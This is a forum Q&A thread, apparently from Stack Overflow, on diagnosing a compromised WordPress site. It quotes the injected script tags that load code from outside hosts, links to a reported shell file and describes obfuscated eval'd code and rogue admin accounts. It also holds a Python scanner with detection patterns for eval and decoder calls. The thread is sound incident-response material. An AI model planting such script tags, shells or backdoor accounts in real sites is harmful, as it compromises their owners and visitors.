Ralph Vugts

Reputation: 425

Script being injected into the top of all my wordpress page

Just noticed ads appearing on one of our WordPress sites. Nailed it down to these scripts being injected into the top of every page:

<script language="javascript" type="text/javascript" src="http://www.mde86.org/jquery.min.Js"></script><div style="display:none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/18658151.js"></script>

Been looking at all the files and database for hours and can't figure out what is injecting it or how it got there.

What we found so far:

But we still can't find where or how the script is being injected.

Any help greatly appreciated.

Someone had a similar issue here but unfortunately removed their post, so only the cached copy remains: http://webcache.googleusercontent.com/search?q=cache:US-HRpncY-QJ:stackoverflow.com/questions/33398784/script-being-injected-into-the-top-of-all-my-wordpress-page+&cd=1&hl=en&ct=clnk&gl=au

Upvotes: 0

Views: 4087

Answers (3)

David T

Reputation: 133

The same thing happened to a client of mine in the last 24 hours or so.

Can you share some information about the plugins you use and your WordPress version?


The file influencing this is wp-admin/setup-config.php. It has encrypted bash code. I also found two admin users generated in wp_users. I think it's obvious that it's an automated attack, but it's pretty sophisticated.

I found the code on some random website via google search. You can review it here: http://tmp.mongit.com/tools/core.txt - It seems to be a shell file, but I'm not really smart when it comes to websec.

On my client's server I also found crap in a root /tmp/ folder (cPanel) that was being somehow accessed by wp_redirect (referenced in pluggable.php line 1196). These files are holding some MySQL info and WP database queries in JSON format. Not really sure how and why these files exist.

[29-Oct-2015 02:45:59 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/xxx/public_html/wp-admin/setup-config.php(514) : eval()'d code(1) : eval()'d code:2) in /home/xxx/public_html/wp-includes/pluggable.php on line 1196

Upvotes: 1

alberto

Reputation: 1

Had the same issue a few hours ago. Finally found, in the root WordPress "index.php", an injected script call on the first line. The script calls a file in the same directory whose name started with .xxxxx, like a .htaccess, so it's hidden, for example, in TCMD. Cleared the line and deleted the file, now all OK. But how the hell somebody could control index.php I don't know....

Upvotes: 0
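The two findings reported in the answers above (a line in `index.php` that pulls in a hidden dotfile, and `eval()`'d obfuscated code inside a core file such as `wp-admin/setup-config.php`) can be searched for across a whole install. The following Python script is an added example, not code from any poster in this thread; it assumes the `index.php` line was a PHP `include`/`require`, and the decoder-function list, the dotfile allowlist and the sample tree (including the name `.cache9`) are constructed for illustration.

```python
import os
import re

# Heuristics below are assumptions drawn from the symptoms reported in this thread.
EVAL_RE = re.compile(rb"\beval\s*\(")
DECODER_RE = re.compile(rb"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")
INCLUDE_RE = re.compile(rb"\b(?:include|require)(?:_once)?\b([^;]*);")
STRING_RE = re.compile(rb"'([^']*)'|\"([^\"]*)\"")
ALLOWED_DOTFILES = {".htaccess", ".htpasswd", ".user.ini"}  # adjust per host

def includes_dotfile(data):
    """True if an include/require names a file whose basename starts with a dot."""
    for stmt in INCLUDE_RE.findall(data):
        for single, double in STRING_RE.findall(stmt):
            base = (single or double).rsplit(b"/", 1)[-1]
            if re.match(rb"\.[A-Za-z0-9_-]", base):
                return True
    return False

def scan_tree(root):
    """Return sorted (relative_path, reason) pairs that need manual review."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name.startswith(".") and name not in ALLOWED_DOTFILES:
                findings.append((rel, "hidden dotfile"))
            if not name.lower().endswith(".php"):
                continue
            with open(path, "rb") as fh:
                data = fh.read()
            if includes_dotfile(data):
                findings.append((rel, "includes a dotfile"))
            if EVAL_RE.search(data) and DECODER_RE.search(data):
                findings.append((rel, "eval plus decoder call"))
    return sorted(findings)

def build_sample_tree(root):
    """Write a small constructed WordPress-like tree with harmless placeholders."""
    files = {"index.php": b"<?php include(__DIR__ . '/.cache9'); ?>\n",
             ".cache9": b"placeholder\n", ".htaccess": b"# BEGIN WordPress\n",
             "wp-admin/setup-config.php": b"<?php eval(base64_decode('ZWNobyAxOw==')); ?>\n",
             "wp-load.php": b"<?php require_once ABSPATH . 'wp-settings.php';\n"}
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)
```

Call `scan_tree()` with the path to the WordPress root; every hit is a lead for manual review, to be compared against a clean copy of the same WordPress version.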

Scriptonomy

Reputation: 4055

Try to narrow down the injection source.

  1. Disable plugins one at a time
  2. Switch to a different theme
  3. Check .htaccess files
  4. Test against server generated injections
  5. Test against browser generated injections

Upvotes: 1
